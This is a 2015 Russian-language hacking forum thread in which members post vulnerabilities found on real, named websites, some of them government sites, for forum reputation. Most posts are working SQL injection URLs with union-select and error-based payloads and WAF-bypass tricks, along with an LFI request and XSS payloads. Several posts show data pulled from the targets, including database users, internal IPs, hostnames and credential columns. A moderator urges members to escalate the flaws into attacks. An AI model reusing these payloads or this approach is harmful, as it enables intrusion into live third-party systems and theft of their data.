Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,372
    Likes Received:
    789
    Reputations:
    20
    Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.

    Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:
    Google:
    Code:
    site:antichat.ru ваш_сайт_с_уязвимостью.ру
    Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.

     
    #1 Егорыч+++, 10 May 2015
    Last edited by a moderator: 31 May 2015
    CyberTro1n and Mister_Bert0ni like this.
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,440
    Reputations:
    53
    Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-
    Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .
     
  3. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,440
    Reputations:
    53
    Три lfi

    http://greyslon.ru/index.php

    post
    action=register
    &ajax=true
    &data=login%3De%26email%3De%26pass%3De%26repass%3De%26payeer%3De%26captcha%3De
    &page=../info
    Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла
     
  4. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,440
    Reputations:
    53
    bidderland.co.in/siteadmin
    Эта уязвимость эксплуатируется за 5 секунд.
    нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.
     
    Bezlishke and Mister_Bert0ni like this.
  5. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    264
    Likes Received:
    102
    Reputations:
    25
    А что не раскрутил ?
    Code:
    http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+
    Версия: 5.5.43-37.2
    User: c2deuts_ice@localhost
    -----------------------------
    Зачем делать несколько постов можно в одном все выложить
     
    #5 WallHack, 10 May 2015
    Last edited: 10 May 2015
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,792
    Likes Received:
    835
    Reputations:
    856
    Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.
     
    _________________________
    Take_IT and yarbabin like this.
  7. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    HTML:
    http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+
    5.5.40-0ubuntu0.12.04.1 - вывод в заголовке

    HTML:
    http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+
    5.6.23

    HTML:
    http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+
    4.1.18-nt
     
  8. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    HTML:
    http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
    idserver_damico@winwebs03.cpt.wa.co.za
    idserver_damicodb
    5.5.42-cll
     
  9. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    http://goo.gl/imjzsb
    http://goo.gl/8IKVeV
    http://goo.gl/wYRBLz

    http://emofans.ru/gallery/emowallp/
    POST_DATA:
    foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0x7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version())e)f)x)) -- -



    https://www.choosewellness.com.ph/campus-vote_video-entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE(),0x3c62723e506f727420203a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSION_COMPILE_MACHINE,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e))x)x)
     
    #9 Mister_Bert0ni, 10 May 2015
    Last edited: 11 May 2015
    papaher and BabaDook like this.
  10. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    Демонстрация SQLi от меня
     
    Шниперсон and kostea like this.
  11. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    Демонстрация SQLi от меня
     
    Шниперсон and Dondo like this.
  12. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    SQLi на сайте bitbank
     
    Шниперсон and Dondo like this.
  13. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    Да да 5 сек даже много)))
     
  14. rezistor

    rezistor New Member

    Joined:
    11 May 2015
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
  15. Arboretum

    Arboretum Member

    Joined:
    8 May 2015
    Messages:
    7
    Likes Received:
    8
    Reputations:
    0
    http://java.lordy.ru/
    Есть жаба игра, зарегавшись, в чате можно написать "><script>alert(XSS)</script>", после этого на java.lordy.ru высветится XSS.
     
    qwaszx000 and fazernotinworld like this.
  16. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    HTML:
    http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database%28%29,0x3a,version%28%29%29+--+
    jhewlett_r@209.68.5.201
    jhewlett_prod:5.0.96-log

    HTML:
    http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    5.0.96-log
    nightgallery20@72.167.232.44
    nightgallery20

    HTML:
    http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x2f,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    10.0.17-MariaDB-cll-lve
    austral3_casso@server-2h-r34.ipv4.au.syr

    HTML:
    http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5+--+
    4.0.26-standard-log
    novagoraTest
    novagoraTest@10.0.5.18
     
  17. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    154
    Likes Received:
    31
    Reputations:
    2
  18. tiger_x

    tiger_x New Member

    Joined:
    9 May 2015
    Messages:
    27
    Likes Received:
    2
    Reputations:
    7
    HTML:
    http://www.oar.org.ro/press.php?id=-1%20union%20all%20select%20null,null,null,version%28%29,null,null%20--
    Версия: 5.6.23
    User: oarorgro_oar@localhost
     
  19. rezistor

    rezistor New Member

    Joined:
    11 May 2015
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
    XSS :)
    http://gov.cap.ru/?__VIEWSTATE=/wEPDwUKLTczMDc3ODY5Nw9kFgJmD2QWAgIDD2QWEgIBD2QWAgIBD2QWAgIBDxYCHgRUZXh0BXLQp9GD0LLQsNGI0YHQutCw0Y8g0YDQtdGB0L/Rg9Cx0LvQuNC60LAgPGRpdj7QntGE0LjRhtC40LDQu9GM0L3Ri9C5INC/0L7RgNGC0LDQuyDQvtGA0LPQsNC90L7QsiDQstC70LDRgdGC0Lg8L2Rpdj5kAgMPZBYOAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwFoZBYCZg8PFgIeC05hdmlnYXRlVXJsBTpodHRwOi8vZ292LmNhcC5ydS9Pcmdhbml6YXRpb24uYXNweD9nb3ZfaWQ9NDkmdW5pdD1jb250YWN0ZGQCBQ8PFgIfAWhkFgJmDw8WAh8CBSpodHRwOi8vZ292LmNhcC5ydS9TdHJ1Y3R1cmUuYXNweD9nb3ZfaWQ9NDlkZAIJDw8WAh8BZ2QWAmYPFgIeBGhyZWYFMmh0dHA6Ly9nb3YuY2FwLnJ1L1NpdGVNYXAuYXNweD9pZD0zNjU0NzcmZ292X2lkPTQ5ZAILDw8WAh8CBShodHRwOi8vZ292LmNhcC5ydS9TaXRlTWFwLmFzcHg/Z292X2lkPTQ5ZGQCDQ8PFgIfAgUtaHR0cDovL2dvdi5jYXAucnUvc3BlYy9EZWZhdWx0LmFzcHg/Z292X2lkPTQ5ZGQCDw8PFgIfAgUmaHR0cDovL2dvdi5jYXAucnUvcnNzLz9nb3ZfaWQ9NDkmaWQ9NDlkZAIHD2QWBgIDDw8WAh8BZ2RkAgUPDxYCHwFnZGQCFQ8PFgIfAWdkZAINDw8WAh8BZ2RkAhEPDxYCHwFoZGQCEw9kFhoCAQ9kFgICAQ8PFgIfAgUcaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPXRvcGRkAgMPZBYCAgEPDxYCHwIFHWluZm8uYXNweD9nb3ZfaWQ9NDkmdHlwZT1tYWluZGQCBQ9kFgICAQ8PFgIfAgUdaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPW5ld3NkZAIHDw8WAh8BaGRkAgkPZBYCAgEPDxYCHwIFFHZpZGVvLmFzcHg/Z292X2lkPTQ5ZGQCCw8PFgIfAWhkZAINDw8WAh8BaGQWAgIBDw8WAh8CBRdjYWxlbmRhci5hc3B4P2dvdl9pZD00OWRkAg8PZBYCAgEPDxYCHwIFGlB1YmxpY2F0aW9uLmFzcHg/Z292X2lkPTQ5ZGQCEQ9kFgICAQ8PFgIfAgUYTWVtb3JpYWxzLmFzcHg/Z292X2lkPTQ5ZGQCEw8PFgIfAWhkZAIVD2QWAgIBDw8WAh8CBRNsYXdzLmFzcHg/Z292X2lkPTQ5ZGQCFw8PFgIfAWhkZAIZDw8WAh8BaGRkAhUPDxYCHwFoZGQCFw8PFgIfAWdkZAIbD2QWAgIBDw8WAh8CBSZPcmdzLmFzcHg/Z292X2lkPTQ5JmlkPTQ5JnVuaXQ9Y29udGFjdGRkZP3Mf6N7ALxvhcyia+88BzPuA4FLR9eN77dXGFDCRBD/&ctl00$Search1$BtnSearch=&__VIEWSTATEGENERATOR=CA0B0334&ctl00$Search1$TextSearch=античат<script>alert()</script>&__EVENTVALIDATION=/wEWBwK1y/X1DALNk6LCAwKbnsfFCAK8lLmCCQLC9M+dCwKC1JS2BwKjz9/DAXkyh+c6G8rMsfjzrV2Wjy6zi7nnNfiqJHMfqPO+S6mI&ctl00$Comments=античат&ctl00$ErrorText=
     
    Mister_Bert0ni likes this.
  20. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    http://goo.gl/uMgvlO
    Code:
    http://www.perio.com.ua/articles.php?id=.13 and @b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE/**_**/(),0x3c62723e506f727420203a3a2020,@@port,0x3c62723e43757272656e745f55736572203a3a202020203a3a  ,@b,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,VERSION(),0xa3c62723e486f73746e616d65203a3a20,0x3c2f7370616e3e,@@HOSTNAME),3,1337,5,6 -- -
    
    Может кто знает как здесь WAF на information_schema обойти?
     
    #20 Mister_Bert0ni, 11 May 2015
    Last edited: 12 May 2015
Loading...